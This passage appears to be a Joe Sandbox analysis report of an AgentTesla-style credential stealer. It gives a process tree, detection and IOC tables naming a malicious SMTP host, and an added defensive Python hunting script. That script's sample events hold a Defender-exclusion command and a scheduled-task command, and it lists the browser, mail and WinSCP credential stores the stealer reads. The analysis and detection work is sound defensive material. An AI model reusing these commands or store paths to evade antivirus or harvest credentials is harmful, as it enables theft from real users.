                               network: api.ipify.org 172.67.74.152, port 443, local ports 49734 and 49737, CLOUDFLARENET (US), United States
                               signature: Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
                         18  powershell.exe (23), started
                               signature: Loading BitLocker PowerShell Module
                               28  conhost.exe, started
                                     signature: Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
                         20  powershell.exe (23), started
                               31  conhost.exe, started
                               33  WmiPrvSE.exe, started
                         26  2 other processes, started
                               37  conhost.exe, started
                    12  jDCErdK.exe (5), started
                         signature: Multi AV Scanner detection for dropped file
                         signature: Machine Learning detection for dropped file
                         22  RegSvcs.exe, started
                               signature: Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
                               signature: Tries to steal Mail credentials (via file / registry access)
                               signature: Tries to harvest and steal ftp login credentials
                               2 other signatures
                         24  schtasks.exe, started
                               35  conhost.exe, started
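                    The Stealing of Sensitive Information section and the behavior graph together describe one chain: a .NET utility (RegSvcs.exe) that is hollowed into and then opens browser, mail and WinSCP/FTP credential stores, talks SMTP on port 25 to mail.iaa-airferight.com, while the parent adds a Defender exclusion via PowerShell and registers a task from a temp XML. The script below is an added example, not part of the Joe Sandbox report, that turns those observations into hunting logic over endpoint telemetry. It assumes a simplified Sysmon-like event schema (plain dicts) that is this example's own; the sample events are constructed from the report's indicators, and the two command lines, the task name and the full Temp path are assumptions, since the report does not show them.

```python
"""Hunt for the AgentTesla-style chain described in this report.

Added example, not part of the Joe Sandbox report. The event schema (dicts with
'event', 'pid', 'image', 'cmdline', 'target', 'dst_host', 'dst_port') is a
simplified Sysmon-like shape assumed here; the sample events are constructed.
"""
import ntpath
from collections import defaultdict

# .NET utilities that AgentTesla-style loaders hollow. RegSvcs.exe is the host
# seen in this report; the other three names are this example's own additions.
HOLLOW_HOSTS = {"regsvcs.exe", "regasm.exe", "msbuild.exe", "installutil.exe"}
MAIL_PORTS = {25, 465, 587}

# Credential stores the report shows RegSvcs.exe opening, grouped by category.
CREDENTIAL_STORES = {
    "browser": (r"\Google\Chrome\User Data\Default\Login Data",
                r"\Microsoft\Edge\User Data\Default\Login Data",
                r"\Mozilla\Firefox\profiles.ini",
                r"\8pecxstudios\Cyberfox\profiles.ini",
                r"\NETGATE Technologies\BlackHawk\profiles.ini"),
    "mail": (r"\Thunderbird\profiles.ini",
             r"\Windows Messaging Subsystem\Profiles",
             r"\IncrediMail\Identities"),
    "ftp_scp": (r"\Martin Prikryl\WinSCP 2\Sessions",
                r"\FTP Navigator\Ftplist.txt"),
}


def _image_name(path):
    return ntpath.basename(path).lower()


def _store_category(target):
    """Map a file path or registry key to a credential-store category, or None."""
    t = target.lower()
    for category, needles in CREDENTIAL_STORES.items():
        if any(n.lower() in t for n in needles):
            return category
    return None


def hunt(events):
    """Return {finding: [details]} for the behaviours the report attributes to the sample."""
    findings = defaultdict(list)
    touched = defaultdict(set)  # pid -> credential-store categories it opened
    for ev in events:
        image = _image_name(ev.get("image", ""))
        kind = ev["event"]
        if kind == "process_create":
            cmd = ev.get("cmdline", "").lower()
            # Defender exclusion via Add-MpPreference. Clear-text form only: an
            # -EncodedCommand variant has to be base64-decoded before matching.
            if image == "powershell.exe" and "add-mppreference" in cmd and "-exclusionpath" in cmd:
                findings["defender_exclusion"].append(ev["pid"])
            # Scheduled task registered from an XML definition under a Temp folder.
            if image == "schtasks.exe" and "/create" in cmd and "/xml" in cmd and "\\temp\\" in cmd:
                findings["task_from_temp_xml"].append(ev["pid"])
        elif kind in ("file_open", "reg_open") and image in HOLLOW_HOSTS:
            category = _store_category(ev["target"])
            if category:
                touched[ev["pid"]].add(category)
        elif kind == "net_connect" and image in HOLLOW_HOSTS and ev.get("dst_port") in MAIL_PORTS:
            findings["smtp_egress_from_hollow_host"].append(
                (ev["pid"], ev.get("dst_host"), ev["dst_port"]))
    # A hollowed host reaching into two or more store categories is the stealer
    # pattern; one category alone (a browser reading its own profile) is noise.
    for pid, categories in touched.items():
        if len(categories) >= 2:
            findings["credential_harvest"].append((pid, sorted(categories)))
    return dict(findings)


REGSVCS = r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"

# Constructed sample events. Paths, keys, hosts, ports and PIDs come from the
# report; the command lines, task name and full Temp path are assumptions.
SAMPLE_EVENTS = [
    {"event": "process_create", "pid": 7644, "cmdline": "",
     "image": r"C:\Users\user\Desktop\purchase order - PO-011024-201.exe"},
    {"event": "process_create", "pid": 7700,
     "image": r"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": r'powershell Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming"'},
    {"event": "process_create", "pid": 7710, "image": r"C:\Windows\SysWOW64\schtasks.exe",
     "cmdline": r'schtasks.exe /Create /TN "Updates\jDCErdK" /XML "C:\Users\user\AppData\Local\Temp\tmpA55D.tmp"'},
    {"event": "process_create", "pid": 8136, "image": REGSVCS, "cmdline": ""},
    {"event": "reg_open", "pid": 8136, "image": REGSVCS,
     "target": r"HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions"},
    {"event": "file_open", "pid": 8136, "image": REGSVCS,
     "target": r"C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data"},
    {"event": "file_open", "pid": 8136, "image": REGSVCS,
     "target": r"C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini"},
    {"event": "net_connect", "pid": 8136, "image": REGSVCS,
     "dst_host": "api.ipify.org", "dst_ip": "172.67.74.152", "dst_port": 443},
    {"event": "net_connect", "pid": 8136, "image": REGSVCS,
     "dst_host": "mail.iaa-airferight.com", "dst_ip": "46.175.148.58", "dst_port": 25},
    # Benign noise: the browser reading its own profile list must not fire.
    {"event": "file_open", "pid": 4000, "image": r"C:\Program Files\Mozilla Firefox\firefox.exe",
     "target": r"C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini"},
]

if __name__ == "__main__":
    for name, hits in hunt(SAMPLE_EVENTS).items():
        print(name, hits)
```

                    Run against the constructed events it reports the Defender exclusion, the task registered from Temp, the credential harvest by PID 8136 across the browser, ftp_scp and mail categories, and the SMTP egress to mail.iaa-airferight.com:25; the api.ipify.org connection on 443 is deliberately left unflagged, since an external-IP lookup alone is common in benign software. Keying the credential rules on the hollowed host image rather than on the store paths alone is what keeps the browser's own profile reads out of the results.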

                    SourceDetectionScannerLabelLink
                    purchase order - PO-011024-201.exe32%ReversingLabsWin32.Trojan.Leonem
                    purchase order - PO-011024-201.exe35%VirustotalBrowse
                    purchase order - PO-011024-201.exe100%Joe Sandbox ML
                    SourceDetectionScannerLabelLink
                    C:\Users\user\AppData\Roaming\jDCErdK.exe100%Joe Sandbox ML
                    C:\Users\user\AppData\Roaming\jDCErdK.exe32%ReversingLabsWin32.Trojan.Leonem
                    C:\Users\user\AppData\Roaming\jDCErdK.exe35%VirustotalBrowse
                    No Antivirus matches
                    SourceDetectionScannerLabelLink
                    mail.iaa-airferight.com8%VirustotalBrowse
                    api.ipify.org0%VirustotalBrowse
Source | Detection | Scanner | Label
https://api.ipify.org/ | 0% | URL Reputation | safe
https://api.ipify.org/ | 0% | URL Reputation | safe
http://www.apache.org/licenses/LICENSE-2.0 | 0% | URL Reputation | safe
http://www.apache.org/licenses/LICENSE-2.0 | 0% | URL Reputation | safe
http://www.fontbureau.com | 0% | URL Reputation | safe
http://www.fontbureau.com/designersG | 0% | URL Reputation | safe
http://www.fontbureau.com/designers/? | 0% | URL Reputation | safe
http://www.founder.com.cn/cn/bThe | 0% | URL Reputation | safe
https://account.dyn.com/ | 0% | URL Reputation | safe
http://www.fontbureau.com/designers? | 0% | URL Reputation | safe
http://www.tiro.com | 0% | URL Reputation | safe
http://www.fontbureau.com/designers | 0% | URL Reputation | safe
http://www.goodfont.co.kr | 0% | URL Reputation | safe
https://api.ipify.org/t | 0% | URL Reputation | safe
http://www.carterandcone.coml | 0% | URL Reputation | safe
http://www.sajatypeworks.com | 0% | URL Reputation | safe
http://www.typography.netD | 0% | URL Reputation | safe
http://www.fontbureau.com/designers/cabarga.htmlN | 0% | URL Reputation | safe
http://www.founder.com.cn/cn/cThe | 0% | URL Reputation | safe
http://www.galapagosdesign.com/staff/dennis.htm | 0% | URL Reputation | safe
https://api.ipify.org | 0% | URL Reputation | safe
http://www.founder.com.cn/cn | 0% | URL Reputation | safe
http://www.founder.com.cn/cn | 0% | URL Reputation | safe
http://www.fontbureau.com/designers/frere-user.html | 0% | URL Reputation | safe
http://www.fontbureau.com/designers/frere-user.html | 0% | URL Reputation | safe
http://www.jiyu-kobo.co.jp/ | 0% | URL Reputation | safe
http://www.jiyu-kobo.co.jp/ | 0% | URL Reputation | safe
http://www.galapagosdesign.com/DPlease | 0% | URL Reputation | safe
http://www.fontbureau.com/designers8 | 0% | URL Reputation | safe
http://www.fonts.com | 0% | URL Reputation | safe
http://www.sandoll.co.kr | 0% | URL Reputation | safe
http://www.urwpp.deDPlease | 0% | URL Reputation | safe
http://www.zhongyicts.com.cn | 0% | URL Reputation | safe
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | 0% | URL Reputation | safe
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | 0% | URL Reputation | safe
http://www.sakkal.com | 0% | URL Reputation | safe
http://mail.iaa-airferight.com | 100% | Avira URL Cloud | malware
http://mail.iaa-airferight.com | 8% | Virustotal |
Name | IP | Active | Malicious | Antivirus Detection | Reputation
mail.iaa-airferight.com | 46.175.148.58 | true | true | | unknown
api.ipify.org | 172.67.74.152 | true | false | | unknown
Name | Malicious | Antivirus Detection | Reputation
https://api.ipify.org/ | false | URL Reputation: safe; URL Reputation: safe | unknown
Name | Source | Malicious | Antivirus Detection | Reputation
http://www.apache.org/licenses/LICENSE-2.0 | purchase order - PO-011024-201.exe, 00000000.00000002.1721501649.0000000005642000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe; URL Reputation: safe | unknown
http://www.fontbureau.com | purchase order - PO-011024-201.exe, 00000000.00000002.1721501649.0000000005642000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://www.fontbureau.com/designersG | purchase order - PO-011024-201.exe, 00000000.00000002.1721501649.0000000005642000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://www.fontbureau.com/designers/? | purchase order - PO-011024-201.exe, 00000000.00000002.1721501649.0000000005642000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://www.founder.com.cn/cn/bThe | purchase order - PO-011024-201.exe, 00000000.00000002.1721501649.0000000005642000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://account.dyn.com/ | purchase order - PO-011024-201.exe, 00000000.00000002.1695549066.0000000003FF1000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000008.00000002.1779040921.0000000000402000.00000040.00000400.00020000.00000000.sdmp, jDCErdK.exe, 00000009.00000002.1786573650.0000000003DA9000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://www.fontbureau.com/designers? | purchase order - PO-011024-201.exe, 00000000.00000002.1721501649.0000000005642000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://mail.iaa-airferight.com | RegSvcs.exe, 00000008.00000002.1781239060.0000000002F0B000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000D.00000002.4107833892.000000000284C000.00000004.00000800.00020000.00000000.sdmp | true | 8%, Virustotal; Avira URL Cloud: malware | unknown
http://www.tiro.com | purchase order - PO-011024-201.exe, 00000000.00000002.1721501649.0000000005642000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://www.fontbureau.com/designers | purchase order - PO-011024-201.exe, 00000000.00000002.1721501649.0000000005642000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://www.goodfont.co.kr | purchase order - PO-011024-201.exe, 00000000.00000002.1721501649.0000000005642000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://api.ipify.org/t | RegSvcs.exe, 00000008.00000002.1781239060.0000000002E91000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000D.00000002.4107833892.00000000027DC000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://www.carterandcone.coml | purchase order - PO-011024-201.exe, 00000000.00000002.1721501649.0000000005642000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://www.sajatypeworks.com | purchase order - PO-011024-201.exe, 00000000.00000002.1721501649.0000000005642000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://www.typography.netD | purchase order - PO-011024-201.exe, 00000000.00000002.1721501649.0000000005642000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://www.fontbureau.com/designers/cabarga.htmlN | purchase order - PO-011024-201.exe, 00000000.00000002.1721501649.0000000005642000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://www.founder.com.cn/cn/cThe | purchase order - PO-011024-201.exe, 00000000.00000002.1721501649.0000000005642000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://www.galapagosdesign.com/staff/dennis.htm | purchase order - PO-011024-201.exe, 00000000.00000002.1721501649.0000000005642000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://api.ipify.org | purchase order - PO-011024-201.exe, 00000000.00000002.1695549066.0000000003FF1000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000008.00000002.1779040921.0000000000402000.00000040.00000400.00020000.00000000.sdmp, RegSvcs.exe, 00000008.00000002.1781239060.0000000002E91000.00000004.00000800.00020000.00000000.sdmp, jDCErdK.exe, 00000009.00000002.1786573650.0000000003DA9000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000D.00000002.4107833892.00000000027DC000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://www.founder.com.cn/cn | purchase order - PO-011024-201.exe, 00000000.00000002.1721501649.0000000005642000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe; URL Reputation: safe | unknown
http://www.fontbureau.com/designers/frere-user.html | purchase order - PO-011024-201.exe, 00000000.00000002.1721501649.0000000005642000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe; URL Reputation: safe | unknown
http://www.jiyu-kobo.co.jp/ | purchase order - PO-011024-201.exe, 00000000.00000002.1721501649.0000000005642000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe; URL Reputation: safe | unknown
http://www.galapagosdesign.com/DPlease | purchase order - PO-011024-201.exe, 00000000.00000002.1721501649.0000000005642000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://www.fontbureau.com/designers8 | purchase order - PO-011024-201.exe, 00000000.00000002.1721501649.0000000005642000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://www.fonts.com | purchase order - PO-011024-201.exe, 00000000.00000002.1721501649.0000000005642000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://www.sandoll.co.kr | purchase order - PO-011024-201.exe, 00000000.00000002.1721501649.0000000005642000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://www.urwpp.deDPlease | purchase order - PO-011024-201.exe, 00000000.00000002.1721501649.0000000005642000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://www.zhongyicts.com.cn | purchase order - PO-011024-201.exe, 00000000.00000002.1721501649.0000000005642000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | purchase order - PO-011024-201.exe, 00000000.00000002.1693602582.00000000025A0000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000008.00000002.1781239060.0000000002E91000.00000004.00000800.00020000.00000000.sdmp, jDCErdK.exe, 00000009.00000002.1782894037.0000000002D71000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000D.00000002.4107833892.00000000027DC000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe; URL Reputation: safe | unknown
http://www.sakkal.com | purchase order - PO-011024-201.exe, 00000000.00000002.1721501649.0000000005642000.00000004.00000800.00020000.00000000.sdmp, purchase order - PO-011024-201.exe, 00000000.00000002.1720142571.0000000004F30000.00000004.00000020.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
IP | Domain | Country | ASN | ASN Name | Malicious
46.175.148.58 | mail.iaa-airferight.com | Ukraine | 56394 | ASLAGIDKOM-NETUA | true
172.67.74.152 | api.ipify.org | United States | 13335 | CLOUDFLARENETUS | false
                    Joe Sandbox version:40.0.0 Tourmaline
                    Analysis ID:1465995
                    Start date and time:2024-07-02 11:46:06 +02:00
                    Joe Sandbox product:CloudBasic
                    Overall analysis duration:0h 9m 34s
                    Hypervisor based Inspection enabled:false
                    Report type:full
                    Cookbook file name:default.jbs
                    Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                    Number of analysed new started processes analysed:18
                    Number of new started drivers analysed:0
                    Number of existing processes analysed:0
                    Number of existing drivers analysed:0
                    Number of injected processes analysed:0
                    Technologies:
                    • HCA enabled
                    • EGA enabled
                    • AMSI enabled
                    Analysis Mode:default
                    Analysis stop reason:Timeout
                    Sample name:purchase order - PO-011024-201.exe
                    Detection:MAL
                    Classification:mal100.troj.spyw.evad.winEXE@20/25@2/2
                    EGA Information:
                    • Successful, ratio: 100%
                    HCA Information:
                    • Successful, ratio: 96%
                    • Number of executed functions: 141
                    • Number of non-executed functions: 15
                    Cookbook Comments:
                    • Found application associated with file extension: .exe
                    • Override analysis time to 240000 for current running targets taking high CPU consumption
                    • Exclude process from analysis (whitelisted): MpCmdRun.exe, SIHClient.exe, conhost.exe, svchost.exe
                    • Excluded domains from analysis (whitelisted): fs.microsoft.com, ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
• Not all processes were analyzed, report is missing behavior information
                    • Report size exceeded maximum capacity and may have missing behavior information.
                    • Report size getting too big, too many NtCreateKey calls found.
                    • Report size getting too big, too many NtOpenKeyEx calls found.
                    • Report size getting too big, too many NtProtectVirtualMemory calls found.
                    • Report size getting too big, too many NtQueryValueKey calls found.
                    • Report size getting too big, too many NtReadVirtualMemory calls found.
Time | Type | Description
05:46:54 | API Interceptor | 26x Sleep call for process: purchase order - PO-011024-201.exe modified
05:46:58 | API Interceptor | 43x Sleep call for process: powershell.exe modified
05:47:02 | API Interceptor | 11007941x Sleep call for process: RegSvcs.exe modified
05:47:04 | API Interceptor | 29x Sleep call for process: jDCErdK.exe modified
10:46:59 | Task Scheduler | Run new task: jDCErdK path: C:\Users\user\AppData\Roaming\jDCErdK.exe
Match | Associated Sample Name / URL | Detection | Threat Name | Context
46.175.148.58 | PO 4500005168 NIKOLA.exe | malicious | AgentTesla |
46.175.148.58 | new shippment.exe | malicious | AgentTesla |
46.175.148.58 | KiOK5LRFEG.exe | malicious | AgentTesla |
46.175.148.58 | rHHG2h2w8U.exe | malicious | AgentTesla |
46.175.148.58 | Shipping & packinglist.exe | malicious | AgentTesla |
46.175.148.58 | PO 4500029546 (Copy-)Tool 9458715.exe | malicious | AgentTesla |
46.175.148.58 | Purchase Order #199072.exe | malicious | AgentTesla |
46.175.148.58 | Bank TT request PO - 12619.exe | malicious | AgentTesla |
46.175.148.58 | Payment advice.exe | malicious | AgentTesla |
46.175.148.58 | QZlNr2E3Nn.exe | malicious | AgentTesla |
172.67.74.152 | 242764.exe | malicious | Ficker Stealer, Rusty Stealer | api.ipify.org/?format=wef
172.67.74.152 | K8mzlntJVN.msi | malicious | Unknown | api.ipify.org/
172.67.74.152 | stub.exe | malicious | Unknown | api.ipify.org/
172.67.74.152 | stub.exe | malicious | Unknown | api.ipify.org/
172.67.74.152 | Sonic-Glyder.exe | malicious | Stealit | api.ipify.org/?format=json
172.67.74.152 | Sky-Beta.exe | malicious | Unknown | api.ipify.org/?format=json
172.67.74.152 | Sky-Beta.exe | malicious | Unknown | api.ipify.org/?format=json
172.67.74.152 | Sky-Beta-Setup.exe | malicious | Stealit | api.ipify.org/?format=json
172.67.74.152 | Sky-Beta.exe | malicious | Stealit | api.ipify.org/?format=json
172.67.74.152 | SongOfVikings.exe | malicious | Unknown | api.ipify.org/?format=json
Match | Associated Sample Name / URL | Detection | Threat Name | Context
mail.iaa-airferight.com | PO 4500005168 NIKOLA.exe | malicious | AgentTesla | 46.175.148.58
mail.iaa-airferight.com | new shippment.exe | malicious | AgentTesla | 46.175.148.58
mail.iaa-airferight.com | KiOK5LRFEG.exe | malicious | AgentTesla | 46.175.148.58
mail.iaa-airferight.com | rHHG2h2w8U.exe | malicious | AgentTesla | 46.175.148.58
mail.iaa-airferight.com | Shipping & packinglist.exe | malicious | AgentTesla | 46.175.148.58
mail.iaa-airferight.com | PO 4500029546 (Copy-)Tool 9458715.exe | malicious | AgentTesla | 46.175.148.58
mail.iaa-airferight.com | Purchase Order #199072.exe | malicious | AgentTesla | 46.175.148.58
mail.iaa-airferight.com | Bank TT request PO - 12619.exe | malicious | AgentTesla | 46.175.148.58
mail.iaa-airferight.com | Payment advice.exe | malicious | AgentTesla | 46.175.148.58
mail.iaa-airferight.com | QZlNr2E3Nn.exe | malicious | AgentTesla | 46.175.148.58
api.ipify.org | 3z5nZg91qJ.exe | malicious | AgentTesla, PureLog Stealer | 172.67.74.152
api.ipify.org | Ziraat Bankasi Swift Mesaji.exe | malicious | GuLoader | 172.67.74.152
api.ipify.org | DHL AWB COMMERCAIL INVOICE AND TRACKNG DETAILS.exe | malicious | AgentTesla | 104.26.13.205
api.ipify.org | Ziraat Bankasi Swift Mesaji.exe | malicious | GuLoader | 104.26.13.205
api.ipify.org | https://pub-4d0a115db8fb4f15a6bf3059fadf5ec9.r2.dev/secure_response.html?user-agent=Mozilla/5.0WindowsNT10.0;Win64;x64AppleWebKit/537.36KHTML,likeGeckoChrome/86.0.4240.75Safari/537.36 | malicious | HTMLPhisher | 104.26.12.205
api.ipify.org | GkYUK8VCrO.exe | malicious | AgentTesla, PureLog Stealer | 104.26.12.205
api.ipify.org | PO 4500005168 NIKOLA.exe | malicious | AgentTesla | 104.26.13.205
api.ipify.org | rQoutation.exe | malicious | AgentTesla, PureLog Stealer | 104.26.13.205
api.ipify.org | F46VBJ6Yvy.exe | malicious | AgentTesla | 104.26.13.205
api.ipify.org | 8w5wHh755H.exe | malicious | AgentTesla | 172.67.74.152
Match | Associated Sample Name / URL | Detection | Threat Name | Context
ASLAGIDKOM-NETUA | PO 4500005168 NIKOLA.exe | malicious | AgentTesla | 46.175.148.58
ASLAGIDKOM-NETUA | new shippment.exe | malicious | AgentTesla | 46.175.148.58
ASLAGIDKOM-NETUA | KiOK5LRFEG.exe | malicious | AgentTesla | 46.175.148.58
ASLAGIDKOM-NETUA | rHHG2h2w8U.exe | malicious | AgentTesla | 46.175.148.58
ASLAGIDKOM-NETUA | Shipping & packinglist.exe | malicious | AgentTesla | 46.175.148.58
ASLAGIDKOM-NETUA | PO 4500029546 (Copy-)Tool 9458715.exe | malicious | AgentTesla | 46.175.148.58
ASLAGIDKOM-NETUA | Purchase Order #199072.exe | malicious | AgentTesla | 46.175.148.58
ASLAGIDKOM-NETUA | Bank TT request PO - 12619.exe | malicious | AgentTesla | 46.175.148.58
ASLAGIDKOM-NETUA | Payment advice.exe | malicious | AgentTesla | 46.175.148.58
ASLAGIDKOM-NETUA | QZlNr2E3Nn.exe | malicious | AgentTesla | 46.175.148.58
CLOUDFLARENETUS | http://go.sparkpostmail1.com/f/a/Qy8XDQJtpeYlkqMezh3Eeg~~/AAVXmQA~/RgRnyyJSP0ROaHR0cHM6Ly9pbnN0LmZlYmFmZWRlcmFsYmVuZWZpdHMuY29tL2x0LzExMjU4OTk5MjgxNjc1MTgvcDY2V19yYmFkYk9LaS02NE9GOGJZVwNzcGNCCmXi0u7pZXh5I2VSE2p1ZHkuY2FzdHJvQGJlcC5nb3ZYBAAAAAA~ | malicious | Unknown | 188.114.97.3
CLOUDFLARENETUS | https://us02web.zoom.us/webinar/register/6317193087387/WN_wbycs5lISL2eo8rEP6qUDg#/registration | malicious | Unknown | 172.64.150.44
CLOUDFLARENETUS | SecuriteInfo.com.Exploit.CVE-2018-0798.4.30916.4690.rtf | malicious | Unknown | 104.21.53.203
CLOUDFLARENETUS | http://qltuh.bellatrixmeissa.com | malicious | Unknown | 188.114.96.3
CLOUDFLARENETUS | New PO#2508006039.shtml | malicious | HTMLPhisher | 1.1.1.1
CLOUDFLARENETUS | Absa.pdf | malicious | HTMLPhisher | 172.64.41.3
CLOUDFLARENETUS | https://drive.google.com/file/d/1D-RSHnHV853uproVdm_FqLilvp6WEgCv/view?ts=6682d412 | malicious | Unknown | 1.1.1.1
CLOUDFLARENETUS | https://scanner.topsec.com/?d=3744&r=auto&u=https%3A%2F%2Fmaknastudio.com%2Fpkyos&t=a4fe2e96fe6815a71cc8a7f1ae1196e6fbcf1f08 | malicious | HTMLPhisher | 1.1.1.1
CLOUDFLARENETUS | https://docs.google.com/presentation/d/e/2PACX-1vRs-1lM259_-Jwhsbc-dg0JIYZUboF3mrOYVHYTqbAmT7KWBl_mwNRSNl0N9QrU4kN-s-_PFfno5ZP3/pub?start=false&loop=false&delayms=3000 | malicious | HTMLPhisher | 188.114.96.3
CLOUDFLARENETUS | PETUNJUK-PENGISIAN DAN PENGIRIMAN KONFIRMASI EDITED.xlsx.scr.exe | malicious | Snake Keylogger | 188.114.96.3
Match | Associated Sample Name / URL | Detection | Threat Name | Context
3b5074b1b5d032e5620f69f9f700ff0e | https://scanner.topsec.com/?d=3744&r=auto&u=https%3A%2F%2Fmaknastudio.com%2Fpkyos&t=a4fe2e96fe6815a71cc8a7f1ae1196e6fbcf1f08 | malicious | HTMLPhisher | 172.67.74.152
3b5074b1b5d032e5620f69f9f700ff0e | https://scanner.topsec.com/?d=3744&r=auto&u=https%3A%2F%2Fmaknastudio.com%2Fpkyos&t=a4fe2e96fe6815a71cc8a7f1ae1196e6fbcf1f08 | malicious | HTMLPhisher | 172.67.74.152
3b5074b1b5d032e5620f69f9f700ff0e | 3z5nZg91qJ.exe | malicious | AgentTesla, PureLog Stealer | 172.67.74.152
3b5074b1b5d032e5620f69f9f700ff0e | http://url2530.tvsmotor.com/ls/click?upn=u001.smInq0-2BkNc5oRshkzMLE7U6zcio2-2F9zwu1ZIXUanV0NJI-2BOrcqj0f4SCu-2B-2BWZYRJ5WulbQ5i5mBsK1zXEak-2FiMRG64aR-2FUGiDgoHteplEfqii9y-2FZm8OviJTU1sjmz7jpaYlxIO-2FZqsCEMZLobIAuBKqKOl6jqYqSAHVwBkUZuGRzhvuesvLIb-2BOJaFEug0CxFHH8i5A3U7lzl-2BTzhlR6ei7mav1762I-2BKvT-2Fk6a5kJfjpj9RJPK9q48Ck5mSzSlgwV-2BsscO5sphM5t-2BVSr5yuCYcPokWOxF7VJFLVcuGxe55FXxdx2OWqy1uhpoEHKlprCsCZc7-2FzwTpK7gWkfISgE1dm3DNZag7jRcJoAY96XjRqTOiYZpVCYj4WczYZatXIFKlGImVUX-2BtzacIIXUkQ-3D-3Dxdxc_PRiWw-2BWerOwUL-2FYAA-2FiwxOm-2BJW3ubqhGFJ5iVqhmG217gfj9KgzNOSRNluvFvYbWIHUd-2ByAsKYpybXBhPgqT-2F1WfaNjyxdi-2FNqxuKfkiep8TocNXSydFj2bAYBLtB5MEDItgpH6g-2FV3171HTXrzYHtaSp7MB2B8WILdzxuyybTMsChhP3QdW9m4oU0X1zagLaXiyfnb7qkeR5CYT3FajfA-3D-3D | malicious | Unknown | 172.67.74.152
3b5074b1b5d032e5620f69f9f700ff0e | QUOTATION_JULQTRA071244#U00faPDF.scr.exe | malicious | AgentTesla, PureLog Stealer | 172.67.74.152
3b5074b1b5d032e5620f69f9f700ff0e | Ziraat Bankasi Swift Mesaji.exe | malicious | GuLoader | 172.67.74.152
3b5074b1b5d032e5620f69f9f700ff0e | DHL AWB COMMERCAIL INVOICE AND TRACKNG DETAILS.exe | malicious | AgentTesla | 172.67.74.152
3b5074b1b5d032e5620f69f9f700ff0e | New Inquiry CAD.scr.exe | malicious | PureLog Stealer | 172.67.74.152
3b5074b1b5d032e5620f69f9f700ff0e | Payment_Confirmation_Receipts.vbs | malicious | GuLoader | 172.67.74.152
3b5074b1b5d032e5620f69f9f700ff0e | Ziraat Bankasi Swift Mesaji.exe | malicious | GuLoader | 172.67.74.152
                                        No context
                                        Process:C:\Users\user\AppData\Roaming\jDCErdK.exe
                                        File Type:ASCII text, with CRLF line terminators
                                        Category:dropped
                                        Size (bytes):1301
                                        Entropy (8bit):5.334025345208678
                                        Encrypted:false
                                        SSDEEP:24:MLUE4K5E4KH1qE4qXKDE4KhKiKhPKIE4oKNzKoZAE4Kze0E4VE4x84j:MIHK5HKH1qHiYHKh3oPtHo6hAHKze0HT
                                        MD5:C8D49A85A61847AAE0536AE8856F6DEC
                                        SHA1:D4121C87789F6AE40FCB9B4F896BC2A0C79182AD
                                        SHA-256:3F7809C712D948FF3404AE242044B5463E60BCDCE93121886F8CB36799D4E3CE
                                        SHA-512:FFD3460D5B6F00C49D7A91B299765BB7620B440718DACA711566C41A0C153F51E936EE479F4B9E002794EF2E0EBFFCED32ACE15CF9C7A892248EFA6A42468D51
                                        Malicious:false
